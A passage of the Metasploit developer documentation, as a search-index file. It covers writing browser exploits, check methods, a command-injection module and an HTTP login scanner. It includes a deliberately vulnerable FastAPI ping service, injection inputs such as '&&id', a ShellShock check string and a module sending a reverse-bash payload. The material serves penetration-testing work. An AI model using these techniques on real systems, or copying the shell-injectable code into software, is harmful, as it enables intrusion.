=&amp;gt; [ [ 'URL', 'http://metasploit.com' ] ], 'Platform' =&amp;gt; 'win', 'BrowserRequirements' =&amp;gt; { source: /script|headers/i }, 'Targets' =&amp;gt; [ [ 'Automatic', {} ], [ 'Windows XP with IE 8', { 'os_name' =&amp;gt; 'Windows XP', 'ua_name' =&amp;gt; 'MSIE', 'ua_ver' =&amp;gt; '8.0' } ], [ 'Windows 7 with IE 9', { 'os_name' =&amp;gt; 'Windows 7', 'ua_name' =&amp;gt; 'MSIE', 'ua_ver' =&amp;gt; '9.0' } ] ], 'Payload' =&amp;gt; { 'BadChars' =&amp;gt; \"\\x00\" }, 'DisclosureDate' =&amp;gt; '2013-04-01', 'DefaultTarget' =&amp;gt; 0 ) ) end def exploit_template(target_info) template = %( Data source: &amp;lt;%=target_info[:source]%&amp;gt;&amp;lt;br&amp;gt; OS name: &amp;lt;%=target_info[:os_name]%&amp;gt;&amp;lt;br&amp;gt; UA name: &amp;lt;%=target_info[:ua_name]%&amp;gt;&amp;lt;br&amp;gt; UA version: &amp;lt;%=target_info[:ua_ver]%&amp;gt;&amp;lt;br&amp;gt; Java version: &amp;lt;%=target_info[:java]%&amp;gt;&amp;lt;br&amp;gt; Office version: &amp;lt;%=target_info[:office]%&amp;gt; ) return template, binding end def on_request_exploit(cli, _request, target_info) send_exploit_html(cli, exploit_template(target_info)) end end . JavaScript Obfuscation . BrowserExploitServer relies on the JSObfu mixin to support JavaScript obfuscation. When you’re writing JavaScript, you should always write it like this: . js = js_obfuscate(your_code) . The #js_obfuscate will return a Rex::Exploitation::JSObfu object. To get the obfuscated JavaScript, call the #to_s method: . js.to_s . If you need to access an obfuscated symbol name, you can use then #sym method: . # Get the obfuscated version of function name test() var_name = js.sym('test') . Note that by default, even though your module is calling the #js_obfuscate method, obfuscation will not kick in unless the user sets the JsObfuscate datastore option. This option is an OptInt, which allows you to set the number of times to obfuscate (default is 0). If your BES-based exploit does not want obfuscation at all, always make sure you call the #deregister_options and remove the JsObfuscate option. Like this: . deregister_options('JsObfuscate') . To learn more about Metasploit’s JavaScript obfuscation capabilities, please read How to obfuscate JavaScript in Metasploit. Related Articles: . | How to write a browser exploit using HttpServer | Information About Unmet Browser Exploit Requirements | . ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-write-a-browser-exploit-using-browserexploitserver.html",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-write-a-browser-exploit-using-browserexploitserver.html"
  },"417": {
    "doc": "Writing a browser exploit",
    "title": "Writing a browser exploit",
    "content": "The Metasploit Framework provides different mixins you can use to develop a browser exploit, mainly they are Msf::Exploit::Remote::HttpServer, Msf::Exploit::Remote::HttpServer::HTML and Msf::Exploit::Remote::BrowserExploitServer. This writeup covers the HttpServer mixin. The HttpServer mixin is kind of the mother of all HTTP server mixins (like BrowserExploitServer and HttpServer::HTML). To use it, your module is required to have a “on_request_uri” method, which is a callback triggered when the HTTP server receives a HTTP request from the browser. An example of setting up “on_request_uri”: . # # Listens for a HTTP request. # cli is the socket object, and request is a Rex::Proto::Http::Request object # def on_request_uri(cli, request) print_status(\"Client requests URI: #{request.uri}\") end . The “on_request_uri” method is also where you can create the HTTP response. Here’s a couple of choices you can use to do that: . | send_not_found(cli) - Sends a 404 to the client. Make sure to pass the cli (socket) object. | send_redirect(cli, location=’/’, body=’’, headers={}) - Redirects the client to a new location. | send_response(cli, body, headers={}) - Sends a response to the client. This method is probably what you’ll be using most of the time. | . If you’ve seen some of our exploit modules, you will also see them using Exploit::Remote::HttpServer::HTML instead of Exploit::Remote::HttpServer. Usage is mostly the same, the difference is the Exploit::Remote::HttpServer::HTML mixin gives you access to some Javascript functions like Base64, heap spraying, OS detection, etc. Here’s an example of sending a HTTP response: . # # Sends a \"Hello, world!\" to the client # def on_request_uri(cli, request) html = \"Hello, world!\" send_response(cli, html) end . Also note that in order to handle a HTTP request, it must contain the base URIPATH, which by default is random. This means if you want to handle multiple URIs (possible if you need to handle a redirect or a link), you also need to make sure they have the base URIPATH. To retrieve the base URIPATH, you can use the “get_resource” method, here’s an example: . def serve_page_1(cli) html = \"This is page 1\" send_response(cli, html) end def serve_page_2(cli) html = \"This is page 2\" send_response(cli, html) end def serve_default_page(cli) html = %Q| &amp;lt;html&amp;gt; &amp;lt;a href=\"#{get_resource.chomp('/')}/page_1.html\"&amp;gt;Go to page 1&amp;lt;/a&amp;gt;&amp;lt;br&amp;gt; &amp;lt;a href=\"#{get_resource.chomp('/')}/page_2.html\"&amp;gt;Go to page 2&amp;lt;/a&amp;gt; &amp;lt;/html&amp;gt; | send_response(cli, html) end def on_request_uri(cli, request) case request.uri when /page_1\\.html$/ serve_page_1(cli) when /page_2\\.html$/ serve_page_2(cli) else serve_default_page(cli) end end . Of course, when you write a Metasploit browser exploit there’s a lot more you need to think about. For example, your module probably needs to do browser detection, because it wouldn’t make any sense to allow Chrome to receive an IE exploit, would it? You probably also need to build a payload that’s specific to the target, which means your module needs to know what target it’s hitting, and you have to build a method to customize the exploit accordingly, etc. The HttpServer and HttpServer::HTML mixin provides all kinds of methods to allow you to accomplish all these. Make sure to check out the API documentation (you can either do this by running msf/documentation/gendocs.sh, or just run “yard” in the msf directory), or checkout existing code examples (especially the recent ones). To get things started, you can always use the following template to start developing your browser exploit: . ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule &amp;lt; Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super( update_info( info, 'Name' =&amp;gt; 'HttpServer mixin example', 'Description' =&amp;gt; %q{ Here's an example of using the HttpServer mixin }, 'License' =&amp;gt; MSF_LICENSE, 'Author' =&amp;gt; [ 'sinn3r' ], 'References' =&amp;gt; [ [ 'URL', 'http://metasploit.com' ] ], 'Platform' =&amp;gt; 'win', 'Targets' =&amp;gt; [ [ 'Generic', {} ], ], 'DisclosureDate' =&amp;gt; '2013-04-01', 'DefaultTarget' =&amp;gt; 0 ) ) end def on_request_uri(cli, _request) html = 'hello' send_response(cli, html) end end . If you want to take a closer look at what the mixin can do, see: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/http/server.rb . ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-browser-exploit-using-httpserver.html",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-browser-exploit-using-httpserver.html"
  },"418": {
    "doc": "How to write a check method",
    "title": "Check Method Output",
    "content": "Modules messages are important to the user, because they keep the user informed about what the module is doing, and usually make the module more debuggable. However, you do also want to keep your messages in verbose mode because it becomes really noisy if the check is used against multiple targets. Ideally, you only should be using these print methods: . | Method | Description | . | vprint_line() | verbose version of print_line | . | vprint_status() | verbose version of print_status that begins with “[*]” | . | vprint_error() | verbose version of print_error that begins with “[x]” | . | vprint_warning() | verbose version of print_warning that begins with “[!]”, in yellow | . Better yet, use the CheckCode description to provide additional information (see below). Note: You shouldn’t be printing if a target is vulnerable or not, as this is automatically handled by the framework when your method returns a check code. ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-check-method.html#check-method-output",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-check-method.html#check-method-output"
  },"419": {
    "doc": "How to write a check method",
    "title": "Check Codes",
    "content": "Once you have determined the vulnerable state, you should return a check code. Check codes are constants defined in Msf::Exploit::CheckCode, and these are the ones you can use: . | Checkcode | Description | . | Exploit::CheckCode::Unknown | Used if the module fails to retrieve enough information from the target machine, such as due to a timeout. | . | Exploit::CheckCode::Safe | Used if the check fails to trigger the vulnerability, or even detect the service. | . | Exploit::CheckCode::Detected | The target is running the service in question, but the check fails to determine whether the target is vulnerable or not. | . | Exploit::CheckCode::Appears | This is used if the vulnerability is determined based on passive reconnaissance. For example: version, banner grabbing, or simply having the resource that’s known to be vulnerable. | . | Exploit::CheckCode::Vulnerable | Only used if the check is able to actually take advantage of the bug, and obtain some sort of hard evidence. For example: for a command execution type bug, get a command output from the target system. For a directory traversal, read a file from the target, etc. Since this level of check is pretty aggressive in nature, you should not try to DoS the host as a way to prove the vulnerability. | . | Exploit::CheckCode::Unsupported | The exploit does not support the check method. If this is the case, then you don’t really have to add the check method. | . The CheckCode also supports an optional description which is printed by the framework upon completion of the check method. For example: . return CheckCode::Appears('Vulnerable component XYZ is installed') . MetasploitModule#check methods should capture any known raise from methods called and return value of class Msf::Exploit::CheckCode. Basically, that means avoiding the use of fail_with or raising exceptions that are not handled within the check method. ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-check-method.html#check-codes",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-check-method.html#check-codes"
  },"420": {
    "doc": "How to write a check method",
    "title": "Remote Check Example",
    "content": "Here’s an abstract example of how a Metasploit check might be written: . # # Returns a check code that indicates the vulnerable state on an app running on OS X # def check if exec_cmd_via_http(\"id\") =~ /uid=\\d+\\(.+\\)/ # Found the correct ID output, good indicating our command executed return Exploit::CheckCode::Vulnerable end http_body = get_http_body if http_body if http_body =~ /Something CMS v1\\.0/ # We are able to find the version therefore more precise about the vuln state return Exploit::CheckCode::Appears elsif http_body =~ /Something CMS/ # All we can tell the vulnerable app is running, but no more info to # determine the vuln return Exploit::CheckCode::Detected end else vprint_error(\"Unable to determine due to a HTTP connection timeout\") return Exploit::CheckCode::Unknown end Exploit::CheckCode::Safe end . Note: If you are writing an auxiliary module with the Msf::Auxiliary::Scanner mixin, you should declare your check method like this: . def check_host(ip) # Do your thing end . Local Exploit Check Example . Most local exploit checks are done by checking the version of the vulnerable file, which is considered passive, therefore they should be flagging Exploit::CheckCode::Appears. Passive local exploit checks don’t necessarily mean they are less reliable, in fact, they are not bad. But to qualify for Exploit::CheckCode::Vulnerable, your check should do the extra mile, which means either you somehow make the program return a vulnerable response, or you inspect the vulnerable code. An example of making the program return a vulnerable response is ShellShock (the following is specific for VMWare): . def check check_str = Rex::Text.rand_text_alphanumeric(5) # ensure they are vulnerable to bash env variable bug if cmd_exec(\"env x='() { :;}; echo #{check_str}' bash -c echo\").include?(check_str) &amp;amp;&amp;amp; cmd_exec(\"file '#{datastore['VMWARE_PATH']}'\") !~ /cannot open/ Exploit::CheckCode::Vulnerable else Exploit::CheckCode::Safe end end . One way to inspect the vulnerable code is to come up with a signature, and see if it exists in the vulnerable process. Here’s an example with adobe_sandbox_adobecollabsync.rb: . # 'AdobeCollabSyncTriggerSignature' =&amp;gt; \"\\x56\\x68\\xBC\\x00\\x00\\x00\\xE8\\xF5\\xFD\\xFF\\xFF\" # 'AdobeCollabSyncTrigger' =&amp;gt; 0x18fa0 def check_trigger signature = session.railgun.memread(@addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger'], target['AdobeCollabSyncTriggerSignature'].length) if signature == target['AdobeCollabSyncTriggerSignature'] return true end return false end def check @addresses = {} acrord32 = session.railgun.kernel32.GetModuleHandleA(\"AcroRd32.exe\") @addresses['AcroRd32.exe'] = acrord32[\"return\"] if @addresses['AcroRd32.exe'] == 0 return Msf::Exploit::CheckCode::Unknown elsif check_trigger return Msf::Exploit::CheckCode::Vulnerable else return Msf::Exploit::CheckCode::Detected end end . Another possible way to inspect is grab the vulnerable file, and use Metasm. But of course, this is a lot slower and generates more network traffic. ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-check-method.html#remote-check-example",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-check-method.html#remote-check-example"
  },"421": {
    "doc": "How to write a check method",
    "title": "AutoCheck Mixin",
    "content": "Metasploit offers the possibility to automatically call the check method before the exploit or run method is run. Just prepend the AutoCheck module for this, nothing more: . prepend Msf::Exploit::Remote::AutoCheck . According to the CheckCode returned by the check method, Framework will decided if the module should be executed or not: . | Checkcode | Module executed? | . | Exploit::CheckCode::Vulnerable | yes | . | Exploit::CheckCode::Appears | yes | . | Exploit::CheckCode::Detected | yes | . | Exploit::CheckCode::Safe | no | . | Exploit::CheckCode::Unsupported | no | . | Exploit::CheckCode::Unknown | no | . This mixin brings two new options that let the operator control its behavior: . | AutoCheck: Sets whether or not the check method will be run. Default is true. | ForceExploit: Override the check result. The check method is run but the module will be executed regardless of the result. Default is false. | . ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-check-method.html#autocheck-mixin",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-check-method.html#autocheck-mixin"
  },"422": {
    "doc": "How to write a check method",
    "title": "How to write a check method",
    "content": "In Metasploit, exploits and auxiliary modules support the check command that allows the user to be able to determine the vulnerable state before using the module. This feature is handy for those who need to verify the vulnerability without actually popping a shell, and used to quickly identify all vulnerable, or possibly exploitable machines on the network. Although vulnerability checks aren’t the focus of Metasploit, because it isn’t a vulnerability scanner like Nexpose, we do actually encourage people to implement the check() method anyway to add more value to the module. If you do write one, make sure to keep these guidelines in mind: . ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-check-method.html",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-check-method.html"
  },"423": {
    "doc": "How to write a cmd injection module",
    "title": "A Vulnerable Service",
    "content": "For the vulnerable service test case, we’ll be using a simple FastAPI service. This is very easy to spin up: . | Install fastapi[all] using your preferred Python package manager (a virtual environment is recommended) | Create a file to hold some Python code (I’ll call it main.py) | Copy the following code into your file: . from fastapi import FastAPI, Response import subprocess app = FastAPI() @app.get(\"/ping\") def ping(ip : str): res = subprocess.run(f\"ping -c 1 {ip}\", shell=True, capture_output=True) return Response(content=res.stdout.decode(\"utf-8\"), media_type=\"text/plain\") . | Start your vulnerable service with uvicorn main:app | Test that the application works with curl: . $ curl http://localhost:8000/ping?ip=1.1.1.1 PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data. 64 bytes from 1.1.1.1: icmp_seq=1 ttl=58 time=16.7 ms --- 1.1.1.1 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 16.739/16.739/16.739/0.000 ms . | Test that your application is exploitable - also with curl: . $ curl localhost:8000/ping?ip=1.1.1.1%20%26%26id PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data. 64 bytes from 1.1.1.1: icmp_seq=1 ttl=58 time=16.6 ms --- 1.1.1.1 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 16.614/16.614/16.614/0.000 ms uid=1000(meta) gid=1000(meta) . | . With this output uid=1000(meta) gid=1000(meta), we know that the id command successfully executed on the target system. Now that we have a vulnerable application we can write a module to pwn it. ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#a-vulnerable-service",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#a-vulnerable-service"
  },"424": {
    "doc": "How to write a cmd injection module",
    "title": "The Structure of a Module",
    "content": "To have a functioning command injection Metasploit module we need a few things: . | Create a subclass of Msf::Exploit::Remote | Include the Msf::Exploit::Remote::HttpClient mixin | Define three methods: . | initialize, which defines metadata for the Module | execute_command, which is what runs the command against the remote server | exploit, wraps execute_command, and can handle some logic when we move to a cmdstager module | . | (Not required, but recommended) a method to substitute or escape bad characters, to be used inside execute_command. This could also just be done inside execute_command instead of a separate function call. | . Where to put a Module . Metasploit looks for custom modules at $HOME/.msf4/modules, but the way you get modules there varies based on how you’re running Metasploit. | If you have a full install of Metasploit on your host, you can just add your custom module to $HOME/.msf4/modules/exploits/custom_mod.rb. | You can also just add a module to Metasploit’s modules folder - This can be helpful when troubleshooting, but it’s not recommended | . | Docker If you’re using the Docker Image, you can also add modules to $HOME/.msf4/modules and that folder will be mounted as a volume inside the Docker container . | You can also change the mount point by modifying the docker-compose file | . | . For testing, the easiest thing to do is the simplest. You can find Metasploit’s exploit directory, copy a file, rename it, and go from there. ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#the-structure-of-a-module",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#the-structure-of-a-module"
  },"425": {
    "doc": "How to write a cmd injection module",
    "title": "A Shell of a Module",
    "content": "The shell of a module that follows the above format is something like this: . class MetasploitModule &amp;lt; msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) # empty for now end def filter_bad_chars(cmd) # empty for now end def execute_command(cmd, _opts = {}) # empty for now end def exploit # empty for now end end . This covers every essential point from The Structure of a Module, although it won’t run yet. ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#a-shell-of-a-module",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#a-shell-of-a-module"
  },"426": {
    "doc": "How to write a cmd injection module",
    "title": "Initialize",
    "content": "The initialize method is used to define and pass metadata. Every initialize method in the metasploit-framework codebase follows the format of an empty info being passed into update_info, which gets passed to the msf::Exploit::Remote initialize method: . def initialize(info = {}) super( update_info( info, # Here is where the metadata goes 'Name' =&amp;gt; 'Command Injection against a test Ping endpoint', 'Description' =&amp;gt; 'This exploits a command injection vulnerability against a test application', 'License' =&amp;gt; MSF_LICENSE, 'Author' =&amp;gt; 'YOUR NAME', 'References' =&amp;gt; [ ['URL', 'https://metasploit.com/'] ], 'DisclosureDate' =&amp;gt; '2023-08-04', 'Platform' =&amp;gt; 'linux', # used for determining compatibility - if you're doing code injection, this may be the language of the webapp 'Targets' =&amp;gt; [ 'Unix Command', { 'Platform' =&amp;gt; ['linux', 'unix'], # linux and unix have different cmd payloads, this gives you more options 'Arch' =&amp;gt; ARCH_CMD, 'Type' =&amp;gt; :unix_cmd, # Running a command - this would be `:linux_dropper` for a cmdstager dropper 'DefaultOptions' =&amp;gt; { 'PAYLOAD' =&amp;gt; 'cmd/unix/reverse_bash', 'RPORT' =&amp;gt; 8000, } } ], 'Payload' =&amp;gt; { 'BadChars' =&amp;gt; '\\x00', } 'Notes' =&amp;gt; { # Required for new modules https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html 'Stability' =&amp;gt; [CRASH_SAFE], 'Reliability' =&amp;gt; [REPEATABLE_SESSION], 'SideEffects' =&amp;gt; [IOC_IN_LOGS] } # Some more metadata options are here: https://docs.metasploit.com/docs/development/developing-modules/module-metadata/module-reference-identifiers.html#code-example-of-references-in-a-module ) ) end . All that this method does is register metadata to the module. ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#initialize",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#initialize"
  },"427": {
    "doc": "How to write a cmd injection module",
    "title": "Filtering",
    "content": "It’s important to ensure that payloads being sent are properly encoded. As an example, if you send a request to the /ping endpoint that looks like /ping?ip=1.1.1.1&amp;amp;&amp;amp;id, you won’t see the “uid=1000(meta) gid=1000(meta)” in the response because &amp;amp; is a special character in HTTP. Encoding requirements might change based on the application you’re trying to inject, so experiment if things aren’t working. def filter_bad_chars(cmd) return cmd .gsub(/&amp;amp;/, '%26') .gsub(/ /, '%20') end . filter_bad_chars takes in cmd, which is a string. cmd has two substitutions applied - the first will translate &amp;amp; to %26, the second translates a space to %20. The .gsub statements are a global substitution across the string, so the entire payload is impacted by the substitutions here (Similar to str.replace in Python). Regardless of whether or not the string is modified, it is returned. ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#filtering",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#filtering"
  },"428": {
    "doc": "How to write a cmd injection module",
    "title": "Execution",
    "content": "The execute_command method takes in cmd and _opts and executes the command on the target. In our case, executing a command is simply adding the command to a GET request and sending it to the /ping endpoint on our sample service. def execute_command(cmd, _opts = {}) send_request_cgi({ 'method' =&amp;gt; 'GET', 'uri' =&amp;gt; '/ping', 'encode_params' =&amp;gt; false, 'vars_get' =&amp;gt; { 'ip' =&amp;gt; \"bing.com%20%26%26%20#{filter_bad_chars(cmd)}\", } }) end . We don’t even need to handle the output of send_request_cgi (Really, there should be no return until the shell exits, since the call to subprocess.run doesn’t return until that shell dies). ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#execution",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#execution"
  },"429": {
    "doc": "How to write a cmd injection module",
    "title": "Exploitation",
    "content": "To finish up, all we need is to define the exploit method. This method is called by Metasploit when you use run within a msfconsole. All that we’ll do here is print a little status message and run the exploit, but later you can modify this method to handle droppers as well: . def exploit print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") execute_command(payload.encoded) end . If you’re running Metasploit and the vulnerable Python service on the same machine, you should be able to simply set the variables and fire: . set RHOST 127.0.0.1 set LHOST 127.0.0.1 run . ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#exploitation",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#exploitation"
  },"430": {
    "doc": "How to write a cmd injection module",
    "title": "Conclusion",
    "content": "That’s it. Put it all together and you have a very simple Command Injection exploit module that shows you the basics of how to throw a payload. Play around with different payloads, follow the How-to-use-command-stagers guide, add some logging to the Python web server, and watch executions over Wireshark. You’ll learn a lot. ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#conclusion",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#conclusion"
  },"431": {
    "doc": "How to write a cmd injection module",
    "title": "How to write a cmd injection module",
    "content": "If you’ve found a way to execute a command on a target, and you’d like to make a simple exploit module to get a shell, this guide is for you. Alternatively, if you have access to fetch commands on the target (curl, wget, ftp, tftp, tnftp, or certutil), you can use a Fetch Payload for a no-code solution. By the end of this guide you’ll understand how to turn Command injection into a shell - from here, you can move on to the command stager article and upgrade your basic :unix_cmd Target to a Dropper for all kinds of payloads with variable command stagers. This guide assumes some knowledge of programming (Understand what a class is, what methods/functions are) but expects no in-depth knowledge of Metasploit internals. ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html"
  },"432": {
    "doc": "Writing a HTTP LoginScanner",
    "title": "Step 1: Set up your target environment",
    "content": "For our demonstration, we will be using Symantec Web Gateway. A trial is available at the vendor’s website. Obviously downloading/installing it would be your first step. ",
    "url": "/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html#step-1-set-up-your-target-environment",
    "relUrl": "/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html#step-1-set-up-your-target-environment"
  },"433": {
    "doc": "Writing a HTTP LoginScanner",
    "title": "Step 2: Set up a client",
    "content": "The purpose of setting up a client is to sample the login request and response. Normally you can do this with: . | A web browser plus a sniffer . | For the sniffer, you can download Wireshark, and have it running. | Use a web browser to login. | Go back to Wireshark and save the HTTP request, this is exactly what you will send in the login module. You will also need to save the HTTP response so that you can check for a successful and a failed login. | . | A browser with Burp . Burp is a tool for performing security testing of web applications. You can download the free version from the vendor’s website. In some cases, Burp is way better than a sniffer because you can modify HTTP requests, it’s also a very convenient way to capture HTTPS traffic. Here’s what you do. | Start Burp. | Configure your web browser’s proxy so Burp can forward traffic. | Use the web browser to login. | Go back to Burp, you can find the history of all the requests and responses. | . | . For our example, this is the request the browser sends to Symantec Web Gateway: . POST /spywall/login.php HTTP/1.1 Host: 192.168.1.176 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.176/spywall/login.php Cookie: PHPSESSID=otgam4mgjrl00h2esk3o2npt05 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 54 USERNAME=gooduser&amp;amp;PASSWORD=GoodPassword&amp;amp;loginBtn=Login . And this is the response Symantec Web Gateway returns for a successful login: . HTTP/1.1 302 Found Date: Tue, 12 May 2015 19:32:31 GMT Server: Apache X-Frame-Options: SAMEORIGIN Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=vmb56vhd7740oqcmth8cqtagq5; path=/; secure; HttpOnly Location: https://192.168.1.176/spywall/executive_summary.php Content-Length: 0 Keep-Alive: timeout=15, max=5000 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 . A failed login response is an HTTP 200 with the following message in the body: . We're sorry, but the username or password you have entered is incorrect. Please retype your username and password. The username and password are case sensitive. ",
    "url": "/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html#step-2-set-up-a-client",
    "relUrl": "/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html#step-2-set-up-a-client"
  },"434": {
    "doc": "Writing a HTTP LoginScanner",
    "title": "Step 3: Start with a LoginScanner template",
    "content": "Your login module mainly consists of three components: the LoginScanner portion, the auxiliary portion, and rpsec. The actual HTTP requests and responses are handled in the LoginScanner portion, so we’ll start from there. Your most basic HTTP LoginScanner template will look like this: . require 'metasploit/framework/login_scanner/http' module Metasploit module Framework module LoginScanner class SymantecWebGateway &amp;lt; HTTP # Attempts to login to the server. # # @param [Metasploit::Framework::Credential] credential The credential information. # @return [Result] A Result object indicating success or failure def attempt_login(credential) end end end end end . Save it under lib/metasploit/framework/login_scanner/. The #attempt_login method . The #attempt_login is called automatically. You can write your entire login code there, but it’s better to break in down into multiple methods so that the code is cleaner, and easier to document and rspec. Typically, all you want #attempt_login to do is focusing on crafting the Result object, pass it to a custom #login routine, and then return the Result object. It almost always looks something like this: . def attempt_login(credential) # Default Result result_opts = { credential: credential, status: Metasploit::Model::Login::Status::INCORRECT, proof: nil, host: host, port: port, protocol: 'tcp' } # Merge login result # credential.public is the username # credential.private is the password result_opts.merge!(do_login(credential.public, credential.private)) # Return the Result object Result.new(result_opts) end . Notice that: . | By default, our proof is nil. | The status is Metasploit::Model::Login::Status::INCORRECT. | We’re calling #do_login, which is our custom login method. | The #do_login method will have to update status and proof before we return the Result object. | . The custom login method . Ok, now let’s talk about building this #do_login method. This is where we send the same HTTP request we sampled earlier. If you’re already familiar with writing a Metasploit module that sends an HTTP request, the first thing that comes to mind is probably using the HttpClient. Well, you can’t do that at all over here, so we have to fall back to Rex::Proto::Http::Client. Fortunately for you, we made all this a little bit easier by creating another request called #send_request, here’s an example of how to use that: . send_request({'uri'=&amp;gt;'/'}) . You will rely on this method a lot to accomplish most of what you need to do here. Ok, now, let’s move on and talk about how to use #send_request to send a login request. Remember in the login request, there is actually a PHPSESSID cookie, you should obtain this first. Usually the web application will give you the session cookie when you request the login page for the very first time, and this happens a lot. Here’s an example of how to grab PHPSESSID: . def get_session_id login_uri = normalize_uri(\"#{uri}/spywall/login.php\") res = send_request({'uri' =&amp;gt; login_uri}) sid = res.get_cookies.scan(/(PHPSESSID=\\w+);*/).flatten[0] || '' return sid end . Now that you have a session ID, you can finally make the login request. Remember in the sample, we have to submit the username, password, loginBtn as a POST request. So let’s do that with #send_request: . protocol = ssl ? 'https' : 'http' peer = \"#{host}:#{port}\" login_uri = normalize_uri(\"#{uri}/spywall/login.php\") res = send_request({ 'uri' =&amp;gt; login_uri, 'method' =&amp;gt; 'POST', 'cookie' =&amp;gt; get_session_id, 'headers' =&amp;gt; { 'Referer' =&amp;gt; \"#{protocol}://#{peer}/#{login_uri}\" }, 'vars_post' =&amp;gt; { 'USERNAME' =&amp;gt; username, 'PASSWORD' =&amp;gt; password, 'loginBtn' =&amp;gt; 'Login' # Found in the HTML form } }) . Now that the request is sent, we need to check the response (the res variable). Typically, you have a few choices to determine a successful login: . | Check the HTTP response code. In this case, we have a 302 (redirect), but know that sometimes the response code can lie so this should not be your first choice. | Check the HTML. With some web applications, you might get a “successful login” message, and you can regex that. This is most likely the most accurate way. | Check the location header. In our case, Symantec returns a 302 and contains no body. But it redirects us to a spywall/executive_summary.php page in the location header, so we can use that. We can also try to access executive_summary.php with a renewed session ID, and make sure we can actually see the admin interface, but requesting an extra page adds more penalty to performance, so this is up to you. | . In the end, your custom login method will probably look something like this: . def do_login(username, password) protocol = ssl ? 'https' : 'http' peer = \"#{host}:#{port}\" login_uri = normalize_uri(\"#{uri}/spywall/login.php\") res = send_request({ 'uri' =&amp;gt; login_uri, 'method' =&amp;gt; 'POST', 'cookie' =&amp;gt; get_session_id, 'headers' =&amp;gt; { 'Referer' =&amp;gt; \"#{protocol}://#{peer}/#{login_uri}\" }, 'vars_post' =&amp;gt; { 'USERNAME' =&amp;gt; username, 'PASSWORD' =&amp;gt; password, 'loginBtn' =&amp;gt; 'Login' # Found in the HTML form } }) if res &amp;amp;&amp;amp; res.headers['Location'].include?('executive_summary.php') return {:status =&amp;gt; LOGIN_STATUS::SUCCESSFUL, :proof =&amp;gt; res.to_s} end {:proof =&amp;gt; res.to_s} end . The exact statuses you can return are: . | Constant | Purpose | . | Metasploit::Model::Login::Status::DENIED_ACCESS | Access is denied | . | Metasploit::Model::Login::Status::DISABLED | Account is disabled | . | Metasploit::Model::Login::Status::INCORRECT | Credential is incorrect | . | Metasploit::Model::Login::Status::LOCKED_OUT | Account has been locked out | . | Metasploit::Model::Login::Status::NO_AUTH_REQUIRED | No authentication | . | Metasploit::Model::Login::Status::SUCCESSFUL | Successful login | . | Metasploit::Model::Login::Status::UNABLE_TO_CONNECT | Unable to connect to the service | . | Metasploit::Model::Login::Status::UNTRIED | Credential has not been tried | . | Metasploit::Model::Login::Status::ALL | All the above (An array) | . When you’re done, your code will look something like this: . https://github.com/rapid7/metasploit-framework/blob/master/lib/metasploit/framework/login_scanner/symantec_web_gateway.rb . ",
